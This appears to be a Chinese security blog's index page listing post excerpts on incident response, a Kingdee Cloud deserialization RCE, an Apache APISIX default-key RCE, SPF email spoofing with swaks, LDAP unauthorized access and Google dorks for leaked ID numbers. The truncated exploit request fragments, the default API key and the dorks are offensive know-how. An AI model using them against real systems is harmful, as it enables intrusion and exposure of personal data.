阶段性回顾
前言公司的知识分享会轮到我了,怎么做ppt还没想清楚,先把要说的先写好吧() 应急响应僵尸木马远控事件唉去应急过的企业都是中小企业,不说安全设备了,有的连像样的交换机都没有,只有一个路由器,面板都不知道怎么进能拿到的信息就是通报上给的ip,然后对着ip查的一些威胁情报那么首先,依照惯例,先查外连 1netstat -ano | findstr ip 红框那一列就是pid 有东西的话定位到,然后在交换机或者路由器上设置阻断规则,把恶意ip全阻断了根据pid定位进程名 1tasklist /FI "PID eq 4992" 找到进程名然后就是找他的位置了 任务管理器查找进程可以直接打开任务管理器找,在详细信息那里,找到后右键找路径 命令行查找进程cmd1wmic process where name="steam.exe" get ExecutablePath 或者 1dir C:\a.exe /s...
金蝶云星空反序列化rce至反弹shell(不能一把梭版)
poc一把梭rce口子不用特意找,正常抓金蝶云的都有然后就是直接一把梭 1234567POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.AppDesigner.AppDesignerService.RecordCurDevCodeInfo.common.kdsvc HTTP/1.1Host: cmd: whoamiContent-Type: application/jsonContent-Length:...
![[纯记录用]SPF 邮件伪造漏洞](/img/cover/1.webp)
[纯记录用]SPF 邮件伪造漏洞
干中学以前没接触过的漏洞,干中学了,以后搞测试,多个测试方向 复现直接用邮件协议测试的工具swaks就行 1swaks --body "wow" --header "Subject:test" -t "xxx@163.com" -f...
有惊无险的应急排查
...
存储桶的一些测试思路
...
艰难的应急,但定位到了主机,找到了木马
事件背景最近在网信办驻场,大多数时候蛮闲的,基本就是搞文档,然后企业要复测,天天被骚扰麻了,就写exp给他们让他们自测,但是有安全事件就要出去应急。这不就接到一个通报,说是木马远控事件看通报文件,时间跨度是2025-09-15 12:45:12-2025-09-15...
![[纯记录用]apache apisix默认密钥致rce漏洞](/img/c1/3.webp)
[纯记录用]apache apisix默认密钥致rce漏洞
poc`x写入恶意路由 1234567891011121314151617181920POST /apisix/admin/routes HTTP/1.1Host: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-API-KEY: edd1c9f034335f136f87ad84b625c8f1{ ...
![[纯记录用]ldap未授权访问漏洞](/img/c1/4.webp)
[纯记录用]ldap未授权访问漏洞
纯记录用用到ldap browser,连一下就行
edu信息泄露
google dorking看看身份证号泄露1site:edu.cn intext:身份证号 夏令营名单1https://*.edu.cn/system/_content/download.jsp?urltype=news.DownloadAttachUrl&owner=1216526319&wbfileid=3823090 初见端倪访问直接下载文件
